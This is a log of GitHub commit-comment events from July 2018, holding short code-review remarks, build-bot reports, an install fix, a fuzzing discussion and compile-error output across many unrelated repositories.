{"id":"7999359273","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29790458,"position":37,"line":54,"path":"tests/TicTacToeTest.php","commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-21T23:45:44Z","updated_at":"2018-07-21T23:45:44Z","author_association":"NONE","body":"Top to bottom is about the levels of abstractions at which you attack the onion.\r\n\r\nFirst, it's the topmost (or rather outermost) layer of the onion. This is the situation you're in now, as these are the topmost tests which help you keep direction.\r\n\r\nAfter these coarsed-grained integration tests, you'll start writing more and more granular integration tests, until you reach unit tests. Then backtrack a little bit in this process, then backtrack a little bit more, until you're back to this level of abstraction and the feature is fully implemented because one of these tests which you just wrote has become green, then on to drilling in with another test among these which you've already written. "}},"created_at":"2018-07-21T23:45:44Z"}
{"id":"7999359556","type":"CommitCommentEvent","actor":{"login":"alexharston"},"repo":{"name":"alexharston/petrank"},"payload":{"comment":{"id":29790459,"position":null,"line":null,"path":null,"commit_id":"51fadbf406ef27558bc61fbfcc9cf786c700b22e","created_at":"2018-07-21T23:46:02Z","updated_at":"2018-07-21T23:46:02Z","author_association":"OWNER","body":"fight me"}},"created_at":"2018-07-21T23:46:02Z"}
{"id":"7999359859","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/workspace-diagnostics"},"payload":{"comment":{"id":29790460,"position":null,"line":null,"path":null,"commit_id":"802f4e5516f328d2fe255e1e759a69c719e2064a","created_at":"2018-07-21T23:46:23Z","updated_at":"2018-07-21T23:46:23Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/2d1a6c07-399c-40f2-9b86-9b2d867b3ba7?env_id=ibm%3Ayp%3Aeu-gb \"workspacediagnostics\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/2107aa8a-53c2-44d5-928c-14fe80c36860?env_id=ibm%3Ayp%3Aeu-gb \"workspacediagnostics\") deployed [workspace-diagnostics](https://github.com/WilliamHolmes/workspace-diagnostics/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180721-234621 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180721-234621\") to [dev](https://console.bluemix.net/apps/36799853-1740-4139-a061-de9e605a0dc9?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-21T23:46:23Z"}
{"id":"7999360886","type":"CommitCommentEvent","actor":{"login":"afgane"},"repo":{"name":"almahmoud/cloudbridge"},"payload":{"comment":{"id":29790461,"position":8,"line":58,"path":"cloudbridge/cloud/providers/azure/helpers.py","commit_id":"5a64b54ced57122a9e84fced6cdcc9bd20e96230","created_at":"2018-07-21T23:47:38Z","updated_at":"2018-07-21T23:47:38Z","author_association":"NONE","body":"It's probably useful to have an example of the input and expected output here. "}},"created_at":"2018-07-21T23:47:38Z"}
{"id":"7999361215","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29790465,"position":null,"line":null,"path":null,"commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-21T23:48:04Z","updated_at":"2018-07-21T23:48:04Z","author_association":"NONE","body":"As a follow-up conclusion to the comments above: you pass them as arguments, after configuring them for each specific scenario. "}},"created_at":"2018-07-21T23:48:04Z"}
{"id":"7999361654","type":"CommitCommentEvent","actor":{"login":"suVrik"},"repo":{"name":"suVrik/libfmt"},"payload":{"comment":{"id":29790466,"position":94,"line":358,"path":"include/fmt/format.h","commit_id":"844fffd36d80088175b91ba6d29dcb47ecc0c709","created_at":"2018-07-21T23:48:35Z","updated_at":"2018-07-21T23:48:35Z","author_association":"OWNER","body":"void*"}},"created_at":"2018-07-21T23:48:35Z"}
{"id":"7999361737","type":"CommitCommentEvent","actor":{"login":"suVrik"},"repo":{"name":"suVrik/libfmt"},"payload":{"comment":{"id":29790467,"position":105,"line":373,"path":"include/fmt/format.h","commit_id":"844fffd36d80088175b91ba6d29dcb47ecc0c709","created_at":"2018-07-21T23:48:42Z","updated_at":"2018-07-21T23:48:42Z","author_association":"OWNER","body":"garbage?"}},"created_at":"2018-07-21T23:48:42Z"}
{"id":"7999361835","type":"CommitCommentEvent","actor":{"login":"c-blake"},"repo":{"name":"BurntSushi/ripgrep"},"payload":{"comment":{"id":29790468,"position":null,"line":null,"path":null,"commit_id":"090216cf002a579c987df76125fcdcb97478d48e","created_at":"2018-07-21T23:48:49Z","updated_at":"2018-07-21T23:48:49Z","author_association":"NONE","body":"Yeah.  That is a good warning.\r\n\r\nAlso, as I alluded to in the long/short option spelling note, the way you deactivate this is different from all the other --no-xyz formations in ripgrep (all booleans, though).  Instead, one sets it to the empty string which makes a lot of sense to me, but the Rust CLI parser stuff seems to require an '=' for that, as in ``--pre=``.  I.e., doing ``--pre ''`` did not work for me.   That might also surprise some people."}},"created_at":"2018-07-21T23:48:49Z"}
{"id":"7999361905","type":"CommitCommentEvent","actor":{"login":"suVrik"},"repo":{"name":"suVrik/libfmt"},"payload":{"comment":{"id":29790469,"position":171,"line":409,"path":"include/fmt/format.h","commit_id":"844fffd36d80088175b91ba6d29dcb47ecc0c709","created_at":"2018-07-21T23:48:55Z","updated_at":"2018-07-21T23:48:55Z","author_association":"OWNER","body":"error"}},"created_at":"2018-07-21T23:48:55Z"}
{"id":"7999362491","type":"CommitCommentEvent","actor":{"login":"suVrik"},"repo":{"name":"suVrik/libfmt"},"payload":{"comment":{"id":29790470,"position":260,"line":489,"path":"include/fmt/format.h","commit_id":"844fffd36d80088175b91ba6d29dcb47ecc0c709","created_at":"2018-07-21T23:49:34Z","updated_at":"2018-07-21T23:49:34Z","author_association":"OWNER","body":"capacity"}},"created_at":"2018-07-21T23:49:34Z"}
{"id":"7999362836","type":"CommitCommentEvent","actor":{"login":"suVrik"},"repo":{"name":"suVrik/libfmt"},"payload":{"comment":{"id":29790471,"position":302,"line":557,"path":"include/fmt/format.h","commit_id":"844fffd36d80088175b91ba6d29dcb47ecc0c709","created_at":"2018-07-21T23:49:59Z","updated_at":"2018-07-21T23:49:59Z","author_association":"OWNER","body":"capacity"}},"created_at":"2018-07-21T23:49:59Z"}
{"id":"7999362923","type":"CommitCommentEvent","actor":{"login":"suVrik"},"repo":{"name":"suVrik/libfmt"},"payload":{"comment":{"id":29790472,"position":313,"line":566,"path":"include/fmt/format.h","commit_id":"844fffd36d80088175b91ba6d29dcb47ecc0c709","created_at":"2018-07-21T23:50:06Z","updated_at":"2018-07-21T23:50:06Z","author_association":"OWNER","body":"capacity"}},"created_at":"2018-07-21T23:50:06Z"}
{"id":"7999364741","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29790473,"position":221,"line":169,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-21T23:52:12Z","updated_at":"2018-07-21T23:52:12Z","author_association":"MEMBER","body":"Okay, I'll add a bit of space"}},"created_at":"2018-07-21T23:52:12Z"}
{"id":"7999365924","type":"CommitCommentEvent","actor":{"login":"edysegura"},"repo":{"name":"sandrooliveira/advanced-css-course"},"payload":{"comment":{"id":29790474,"position":8,"line":13,"path":"Natours/css/style.css","commit_id":"8dd40514becee8bd9a4d847d249f853f1cd8858a","created_at":"2018-07-21T23:53:33Z","updated_at":"2018-07-21T23:53:33Z","author_association":"NONE","body":"You are using 4 spaces instead of 2 for indentation! :p"}},"created_at":"2018-07-21T23:53:33Z"}
{"id":"7999370667","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790479,"position":null,"line":null,"path":null,"commit_id":"27c02bc659f002ef986f3e16a4755166c3fc3c20","created_at":"2018-07-21T23:59:16Z","updated_at":"2018-07-21T23:59:16Z","author_association":"NONE","body":"develop (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1695 of 1695 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-21T23:59:16Z"}
{"id":"7999370924","type":"CommitCommentEvent","actor":{"login":"PowellA12"},"repo":{"name":"AlmuraDev/ServerContent"},"payload":{"comment":{"id":29790480,"position":null,"line":null,"path":null,"commit_id":"7560c33513e99e69ae01259fdd98eecfb61bfa06","created_at":"2018-07-21T23:59:34Z","updated_at":"2018-07-21T23:59:34Z","author_association":"NONE","body":"i will close the github page for it then"}},"created_at":"2018-07-21T23:59:34Z"}
{"id":"7997922676","type":"CommitCommentEvent","actor":{"login":"sprunk"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29786727,"position":null,"line":null,"path":null,"commit_id":"d258fd0b542be03e7b5ad060d1c7ed6c9048dea4","created_at":"2018-07-21T03:01:39Z","updated_at":"2018-07-21T03:01:39Z","author_association":"MEMBER","body":"Looks like it's more than just whitespace."}},"created_at":"2018-07-21T03:01:39Z"}
{"id":"7997924010","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29786732,"position":null,"line":null,"path":null,"commit_id":"688b6ce3c9ad1fe31ac2ce80fee8e25fa0445038","created_at":"2018-07-21T03:02:46Z","updated_at":"2018-07-21T03:02:46Z","author_association":"OWNER","body":"Also made it possible to find multiple rocks on rocky ground"}},"created_at":"2018-07-21T03:02:46Z"}
{"id":"7997930052","type":"CommitCommentEvent","actor":{"login":"clayha"},"repo":{"name":"MISP/MISP"},"payload":{"comment":{"id":29786745,"position":2,"line":46,"path":"INSTALL/INSTALL.rhel7.txt","commit_id":"88a1fdd59e30c3661e5ecedb846966303f15be92","created_at":"2018-07-21T03:08:19Z","updated_at":"2018-07-21T03:08:19Z","author_association":"NONE","body":"This ones important and failing by default - without it can't install ssdeep and python2-pip.\r\nEPEL isn't installing via yum without an established key: \"warning: /var/tmp/yum-root-UTdLeg/epel-release-latest-7.noarch.rpm: Header V3 RSA/SHA256 Signature, key ID 352c64e5: NOKEY\"\r\nFix action:\r\nsudo rpm -ivh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm\r\nConfirm installed correctly: \r\nyum repolist\r\nresults should contain \r\nrepo id: epel/x86_64\r\nrepo name: Extra Packages for Enterprise Linux 7 - x86_64"}},"created_at":"2018-07-21T03:08:19Z"}
{"id":"7997930634","type":"CommitCommentEvent","actor":{"login":"harrywang01"},"repo":{"name":"harrywang01/test"},"payload":{"comment":{"id":29786747,"position":null,"line":null,"path":null,"commit_id":"e111d298474027aad30874a9be0c15f5bd5e45de","created_at":"2018-07-21T03:08:52Z","updated_at":"2018-07-21T03:08:52Z","author_association":"OWNER","body":"体骄傲"}},"created_at":"2018-07-21T03:08:52Z"}
{"id":"7997930766","type":"CommitCommentEvent","actor":{"login":"harrywang01"},"repo":{"name":"harrywang01/test"},"payload":{"comment":{"id":29786748,"position":null,"line":null,"path":null,"commit_id":"e111d298474027aad30874a9be0c15f5bd5e45de","created_at":"2018-07-21T03:09:01Z","updated_at":"2018-07-21T03:09:01Z","author_association":"OWNER","body":"dfad"}},"created_at":"2018-07-21T03:09:01Z"}
{"id":"7997933179","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29786749,"position":null,"line":null,"path":null,"commit_id":"baceb8693d268c14bea7cdbe419d9d434f26c95c","created_at":"2018-07-21T03:11:13Z","updated_at":"2018-07-21T03:11:13Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-21T03:11:13Z"}
{"id":"7997933240","type":"CommitCommentEvent","actor":{"login":"djrcg"},"repo":{"name":"djrcg/pagina-web"},"payload":{"comment":{"id":29786750,"position":5,"line":5,"path":"index.html","commit_id":"6bc99c41443b6158219be8a5c0543a58cb83e20c","created_at":"2018-07-21T03:11:17Z","updated_at":"2018-07-21T03:11:17Z","author_association":"OWNER","body":"esto tendria q estar en mayuscula"}},"created_at":"2018-07-21T03:11:17Z"}
{"id":"7997935437","type":"CommitCommentEvent","actor":{"login":"JoseJuvenaldo"},"repo":{"name":"JoseJuvenaldo/uml_simples"},"payload":{"comment":{"id":29786755,"position":null,"line":null,"path":null,"commit_id":"a3d0920f5bcdf83ce23b1281f5526c5095a5f2a6","created_at":"2018-07-21T03:13:18Z","updated_at":"2018-07-21T03:13:18Z","author_association":"OWNER","body":"Projeto em dupla:\r\nJosé Juvenaldo\r\nRonaldo Silva"}},"created_at":"2018-07-21T03:13:18Z"}
{"id":"7997938897","type":"CommitCommentEvent","actor":{"login":"Quemuel-Nassor"},"repo":{"name":"Quemuel-Nassor/Controle-Economico"},"payload":{"comment":{"id":29786765,"position":null,"line":null,"path":null,"commit_id":"eb20a843b6b4bd7a8c04748dec4437097e8e2846","created_at":"2018-07-21T03:16:05Z","updated_at":"2018-07-21T03:16:05Z","author_association":"OWNER","body":"manipulação incorreta do commit"}},"created_at":"2018-07-21T03:16:05Z"}
{"id":"7997939469","type":"CommitCommentEvent","actor":{"login":"qwewqewr"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29786766,"position":null,"line":null,"path":null,"commit_id":"a942853d55dd0e96ff98e6c352e2c2a9e000ea86","created_at":"2018-07-21T03:16:36Z","updated_at":"2018-07-21T03:16:36Z","author_association":"NONE","body":"yeah i got the same issue yesterday when trying to recompile, i redownloaded rAthena at https://github.com/rathena/rathena and compile it, then nothing happened though."}},"created_at":"2018-07-21T03:16:36Z"}
{"id":"7997940948","type":"CommitCommentEvent","actor":{"login":"IceLitty"},"repo":{"name":"IceLitty/MagicSpells"},"payload":{"comment":{"id":29786768,"position":null,"line":null,"path":null,"commit_id":"b246ccdec74df92d221ab313dfa735195066024b","created_at":"2018-07-21T03:18:05Z","updated_at":"2018-07-21T03:18:05Z","author_association":"OWNER","body":"sry, auto used pre-commit header to submit..."}},"created_at":"2018-07-21T03:18:05Z"}
{"id":"7997952904","type":"CommitCommentEvent","actor":{"login":"Samgisaninja"},"repo":{"name":"Samgisaninja/SuccessionRestore"},"payload":{"comment":{"id":29786786,"position":null,"line":null,"path":null,"commit_id":"c35b3262014089a5bf16e36becb4b8ba79d08197","created_at":"2018-07-21T03:29:36Z","updated_at":"2018-07-21T03:29:36Z","author_association":"OWNER","body":"@xerub so I'm actually having some trouble getting this to work, I have the following entitlements:\r\n\r\n```\r\n\t<key>com.apple.private.security.container-required</key>\r\n\t<false/>\r\n\t<key>com.apple.private.security.no-container</key>\r\n\t<true/>\r\n\t<key>com.apple.private.security.no-sandbox</key>\r\n\t<true/>\r\n\t<key>com.apple.private.security.system-application</key>\r\n\t<true/>\r\n\t<key>com.apple.private.diskimages.kext.user-client-access</key>\r\n\t<true/>\r\n\t<key>com.apple.private.security.disk-device-access</key>\r\n\t<true/>\r\n\t<key>platform-application</key>\r\n\t<true/>\r\n```\r\n\r\nbut I still have the following reports on the system logs. on iOS 11, it appears to attach to a disk, in this case, /dev/disk5 , but then fails at mounting:\r\n```\r\nJul 13 19:04:43 Sams-iPhone-7 SuccessionRestore[972] <Notice>: SUCCESSIONTESTING: thedisk: 0, /dev/disk5\r\nJul 13 19:04:43 Sams-iPhone-7 kernel(Sandbox)[0] <Notice>: Sandbox: 1 duplicate report for backupd deny(1) file-unmount\r\nJul 13 19:04:43 Sams-iPhone-7 kernel(Sandbox)[0] <Error>: Sandbox: SuccessionRestor(972) System Policy: deny(1) file-mount /private/var/mobile/Media/Succession/mnt\r\nJul 13 19:04:43 Sams-iPhone-7 SuccessionRestore[972] <Notice>: SUCCESSIONTESTING: mount: -1\r\n```\r\nOn iOS 10, it doesn't appear to be attached to a disk, since `thedisk` has a value of \"\" (it doesn't say null, so it has a value, but the value is literally nothing:\r\n```\r\nJul 13 22:53:02 Sams-iPhone-5S SuccessionRestore[1692] <Notice>: SUCCESSIONTESTING: thedisk: 5,\r\nJul 13 22:53:02 Sams-iPhone-5S SuccessionRestore[1692] <Notice>: SUCCESSIONTESTING: mount: -1\r\nJul 13 22:53:02 Sams-iPhone-5S kernel(Sandbox)[0] <Notice>: SandboxViolation: SuccessionRestor(1692) System Policy: deny(1) file-mount /mnt/Succession\r\n```\r\n\r\nAny assistance would be greatly appreciated."}},"created_at":"2018-07-21T03:29:36Z"}
{"id":"7997954510","type":"CommitCommentEvent","actor":{"login":"plusun"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29786793,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-21T03:31:03Z","updated_at":"2018-07-21T03:31:03Z","author_association":"OWNER","body":"> check return status from regcomp(3) and regexec(3) always\r\n\r\nDone. Actually checking of regexec is no necessary, because even if we have detected the invalid status, we still only need to continue free()ing and regfree() and exit normally.\r\n\r\n>no I/O functions in each iteration unless needed for debugging purposes (if so, we can ifdef it)\r\n\r\nRemoved.\r\n\r\n>please include in the fuzzing process flag to regcomp(3) {a trick with checking for length and memcpy(&flag, Data, sizeof(int)) is fine}\r\n\r\nI think this should not be done like this. For several reasons:\r\n\r\n- The manual specified several flags to be used, if we use arbitrary integer, there might be undefined behaviors. What's more, the error returning values seem to not handle the invalid flags.\r\n- There are only a small set of valid flags out of the whole int set. So this will result in the \"needle in the haystack\" situation which has been mentioned to be difficult for libFuzzer\r\n- For the regex, I enabled \"only_ascii\" fuzzing flag to find some meaningfull bugs, so if we want to fuzz the flags, we cannot get the proper flags specified by the manual because these flags may be defined as 0, 1 ,2 and etc. These values are not printable characters.\r\n- The flags are closely related to the parameters we should use. From the manual, we can see that:\r\n\r\n> If REG_NOSUB was specified in the compilation of the RE, or if nmatch is\r\n> 0, regexec() ignores the pmatch argument (but see below for the case\r\n> where REG_STARTEND is specified).\r\n\r\nFor above reasons, I'd rather manually adjust the flags and other parameters to fit different usages, instead of wildly fuzzing the.\r\n\r\n>please delete the current findings.\r\n\r\nUpdated, old files are removed and there is still a crash. Please use this program to reproduce: https://github.com/plusun/src/tree/gsoc2018/tests/fuzz/regex/libc/regexec/bug"}},"created_at":"2018-07-21T03:31:03Z"}
{"id":"7997956340","type":"CommitCommentEvent","actor":{"login":"djl52102"},"repo":{"name":"djl52102/store"},"payload":{"comment":{"id":29786794,"position":null,"line":null,"path":null,"commit_id":"c24402018f89f49b0324549d18d91a9fa6777e0c","created_at":"2018-07-21T03:32:50Z","updated_at":"2018-07-21T03:32:50Z","author_association":"OWNER","body":"### 用户模块\r\n  - 注册功能  点击注册按钮,进入注册页面.提交注册表单会将注册信息保存入数据库,如果成功,会给用户邮箱发送激活邮件,点击激活才能正常登陆.\r\n  - 登陆功能  登陆之前,会判断用户名,密码是否正确,用户名,密码正确,会判断用户是否激活,激活之后才可以正常登陆.登陆之后会将用户信息存入session,跳转到首页,显示欢迎xxx,并显示我的订单按钮.如果用户登录时勾选自动登录,会将用户信息存入cookie,用户再次访问会自动登录.\r\n "}},"created_at":"2018-07-21T03:32:50Z"}
{"id":"7997956964","type":"CommitCommentEvent","actor":{"login":"djl52102"},"repo":{"name":"djl52102/store"},"payload":{"comment":{"id":29786795,"position":11,"line":11,"path":"README.md","commit_id":"c24402018f89f49b0324549d18d91a9fa6777e0c","created_at":"2018-07-21T03:33:24Z","updated_at":"2018-07-21T03:33:24Z","author_association":"OWNER","body":"用户模块\r\n注册功能 点击注册按钮,进入注册页面.提交注册表单会将注册信息保存入数据库,如果成功,会给用户邮箱发送激活邮件,点击激活才能正常登陆.\r\n登陆功能 登陆之前,会判断用户名,密码是否正确,用户名,密码正确,会判断用户是否激活,激活之后才可以正常登陆.登陆之后会将用户信息存入session,跳转到首页,显示欢迎xxx,并显示我的订单按钮.如果用户登录时勾选自动登录,会将用户信息存入cookie,用户再次访问会自动登录."}},"created_at":"2018-07-21T03:33:24Z"}
{"id":"7997957235","type":"CommitCommentEvent","actor":{"login":"youyooyou"},"repo":{"name":"youyooyou/git_hello"},"payload":{"comment":{"id":29786796,"position":null,"line":null,"path":null,"commit_id":"c41fbfb84b085d20462dd4c9b3f318a3863e7808","created_at":"2018-07-21T03:33:41Z","updated_at":"2018-07-21T03:33:41Z","author_association":"OWNER","body":"git学习"}},"created_at":"2018-07-21T03:33:41Z"}
{"id":"7997957274","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29786797,"position":null,"line":null,"path":null,"commit_id":"60930234e30ece2817cf23fb234dd674fc67294e","created_at":"2018-07-21T03:33:43Z","updated_at":"2018-07-21T03:33:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [CrayonBank](https://trello.com/c/9A6lNHFk/11-crayonbank)"}},"created_at":"2018-07-21T03:33:43Z"}
{"id":"7997958854","type":"CommitCommentEvent","actor":{"login":"djl52102"},"repo":{"name":"djl52102/store"},"payload":{"comment":{"id":29786799,"position":11,"line":11,"path":"README.md","commit_id":"c24402018f89f49b0324549d18d91a9fa6777e0c","created_at":"2018-07-21T03:35:16Z","updated_at":"2018-07-21T03:35:16Z","author_association":"OWNER","body":"用户模块\r\n注册功能 点击注册按钮,进入注册页面.提交注册表单会将注册信息保存入数据库,如果成功,会给用户邮箱发送激活邮件,点击激活才能正常登陆.\r\n登陆功能 登陆之前,会判断用户名,密码是否正确,用户名,密码正确,会判断用户是否激活,激活之后才可以正常登陆.登陆之后会将用户信息存入session,跳转到首页,显示欢迎xxx,并显示我的订单按钮.如果用户登录时勾选自动登录,会将用户信息存入cookie,用户再次访问会自动登录."}},"created_at":"2018-07-21T03:35:16Z"}
{"id":"7997960630","type":"CommitCommentEvent","actor":{"login":"garrettjonesgoogle"},"repo":{"name":"GoogleCloudPlatform/google-cloud-java"},"payload":{"comment":{"id":29786802,"position":null,"line":null,"path":null,"commit_id":"132973855c5f407a739da3d98a04f0f1c20eb9f7","created_at":"2018-07-21T03:36:58Z","updated_at":"2018-07-21T03:36:58Z","author_association":"MEMBER","body":"I did... I'm not sure why it let you push it..."}},"created_at":"2018-07-21T03:36:58Z"}
{"id":"7997961449","type":"CommitCommentEvent","actor":{"login":"satishdotpatel"},"repo":{"name":"ceph/ceph-ansible"},"payload":{"comment":{"id":29786804,"position":null,"line":null,"path":null,"commit_id":"d3b427e16990f9ebcde7575aae367fd7dfe36a8d","created_at":"2018-07-21T03:37:47Z","updated_at":"2018-07-21T03:37:47Z","author_association":"NONE","body":"why this bug not pushed to other branches ?"}},"created_at":"2018-07-21T03:37:47Z"}
{"id":"7997962698","type":"CommitCommentEvent","actor":{"login":"DrBlight"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":29786805,"position":null,"line":null,"path":null,"commit_id":"d595604dc51aeee59ab3f0645bc0a165b1342a0b","created_at":"2018-07-21T03:39:10Z","updated_at":"2018-07-21T03:39:10Z","author_association":"CONTRIBUTOR","body":"Yours is indeed better!"}},"created_at":"2018-07-21T03:39:10Z"}
{"id":"7997962705","type":"CommitCommentEvent","actor":{"login":"garrettjonesgoogle"},"repo":{"name":"GoogleCloudPlatform/google-cloud-java"},"payload":{"comment":{"id":29786806,"position":null,"line":null,"path":null,"commit_id":"132973855c5f407a739da3d98a04f0f1c20eb9f7","created_at":"2018-07-21T03:39:11Z","updated_at":"2018-07-21T03:39:11Z","author_association":"MEMBER","body":"@danoscarmike I figured it out - it's because you're an administrator; I now had to set an *extra* setting to enforce the requirement for administrators too. \r\n"}},"created_at":"2018-07-21T03:39:11Z"}
{"id":"7997963172","type":"CommitCommentEvent","actor":{"login":"karpo1204"},"repo":{"name":"karpo1204/gitTestTogether"},"payload":{"comment":{"id":29786807,"position":2,"line":22,"path":"gitTestTogether/gitTestTogether/AppDelegate.swift","commit_id":"f254f5e3daa2f00e6f4363bb3566c1874ad8b1b0","created_at":"2018-07-21T03:39:40Z","updated_at":"2018-07-21T03:39:40Z","author_association":"OWNER","body":"print(\"Hiafxhgscbkecn\")"}},"created_at":"2018-07-21T03:39:40Z"}
{"id":"7997964558","type":"CommitCommentEvent","actor":{"login":"navidcy"},"repo":{"name":"FourierFlows/FourierFlows.jl"},"payload":{"comment":{"id":29786809,"position":null,"line":null,"path":null,"commit_id":"99f111244ee5e3353a6a71f654f96e84382d58ff","created_at":"2018-07-21T03:41:02Z","updated_at":"2018-07-21T03:41:02Z","author_association":"MEMBER","body":"@glwagner, is there a simpler/more elegant way to do that?"}},"created_at":"2018-07-21T03:41:02Z"}
{"id":"7997965884","type":"CommitCommentEvent","actor":{"login":"Edouard360"},"repo":{"name":"YosefLab/scVI"},"payload":{"comment":{"id":29786811,"position":5,"line":20,"path":"run_benchmarks.py","commit_id":"15595fe57a539f5f659a1312e5ae6a6dffd17b86","created_at":"2018-07-21T03:42:21Z","updated_at":"2018-07-21T03:42:21Z","author_association":"COLLABORATOR","body":"following #107\r\n"}},"created_at":"2018-07-21T03:42:21Z"}
{"id":"7997966324","type":"CommitCommentEvent","actor":{"login":"yuan77777"},"repo":{"name":"phantomSuying/ex4"},"payload":{"comment":{"id":29786812,"position":null,"line":null,"path":null,"commit_id":"10ed00da5cad15be36a13d0066a3d3a543e3b689","created_at":"2018-07-21T03:42:51Z","updated_at":"2018-07-21T03:42:51Z","author_association":"NONE","body":"666"}},"created_at":"2018-07-21T03:42:51Z"}
{"id":"7997967416","type":"CommitCommentEvent","actor":{"login":"juicechu"},"repo":{"name":"aria2/aria2"},"payload":{"comment":{"id":29786813,"position":null,"line":null,"path":null,"commit_id":"e8e04d6f22a507e8374651d3d2343cd9fb986993","created_at":"2018-07-21T03:43:57Z","updated_at":"2018-07-21T03:43:57Z","author_association":"NONE","body":"It word for me, if happen this error\r\n```\r\nmake[3]: Entering directory '/home/pi/Downloads/aria2-1.34.0/src'\r\n  CXX      InternalDHKeyExchange.lo\r\n../libtool: line 1761: warning: setlocale: LC_CTYPE: cannot change locale (en_US.UTF-8)\r\nIn file included from InternalDHKeyExchange.h:40:0,\r\n                 from InternalDHKeyExchange.cc:36:\r\nbignum.h: In constructor 'bignum::ulong<dim>::ulong()':\r\nbignum.h:34:25: error: 'make_unique' was not declared in this scope\r\n   inline ulong() : buf_(make_unique<char_t[]>(dim)) {}\r\n                         ^\r\nbignum.h:34:43: error: expected primary-expression before '[' token\r\n   inline ulong() : buf_(make_unique<char_t[]>(dim)) {}\r\n                                           ^\r\nbignum.h:34:44: error: expected primary-expression before ']' token\r\n   inline ulong() : buf_(make_unique<char_t[]>(dim)) {}\r\n                                            ^\r\nbignum.h: In constructor 'bignum::ulong<dim>::ulong(size_t)':\r\nbignum.h:35:33: error: 'make_unique' was not declared in this scope\r\n   inline ulong(size_t t) : buf_(make_unique<char_t[]>(dim))\r\n                                 ^\r\nbignum.h:35:51: error: expected primary-expression before '[' token\r\n   inline ulong(size_t t) : buf_(make_unique<char_t[]>(dim))\r\n                                                   ^\r\nbignum.h:35:52: error: expected primary-expression before ']' token\r\n   inline ulong(size_t t) : buf_(make_unique<char_t[]>(dim))\r\n                                                    ^\r\nbignum.h: In copy constructor 'bignum::ulong<dim>::ulong(const bignum::ulong<dim>&)':\r\nbignum.h:39:46: error: 'make_unique' was not declared in this scope\r\n   inline ulong(const ulong<dim>& rhs) : buf_(make_unique<char_t[]>(dim))\r\n                                              ^\r\nbignum.h:39:64: error: expected primary-expression before '[' token\r\n   inline ulong(const ulong<dim>& rhs) : buf_(make_unique<char_t[]>(dim))\r\n                                                                ^\r\nbignum.h:39:65: error: expected primary-expression before ']' token\r\n   inline ulong(const ulong<dim>& rhs) : buf_(make_unique<char_t[]>(dim))\r\n                                                                 ^\r\nbignum.h: In constructor 'bignum::ulong<dim>::ulong(const char_t*, size_t)':\r\nbignum.h:44:14: error: 'make_unique' was not declared in this scope\r\n       : buf_(make_unique<char_t[]>(dim))\r\n              ^\r\nbignum.h:44:32: error: expected primary-expression before '[' token\r\n       : buf_(make_unique<char_t[]>(dim))\r\n                                ^\r\nbignum.h:44:33: error: expected primary-expression before ']' token\r\n       : buf_(make_unique<char_t[]>(dim))\r\n                                 ^\r\nMakefile:2300: recipe for target 'InternalDHKeyExchange.lo' failed\r\nmake[3]: *** [InternalDHKeyExchange.lo] Error 1\r\nmake[3]: Leaving directory '/home/pi/Downloads/aria2-1.34.0/src'\r\nMakefile:2341: recipe for target 'all-recursive' failed\r\nmake[2]: *** [all-recursive] Error 1\r\nmake[2]: Leaving directory '/home/pi/Downloads/aria2-1.34.0/src'\r\nMakefile:556: recipe for target 'all-recursive' failed\r\nmake[1]: *** [all-recursive] Error 1\r\nmake[1]: Leaving directory '/home/pi/Downloads/aria2-1.34.0'\r\nMakefile:467: recipe for target 'all' failed\r\nmake: 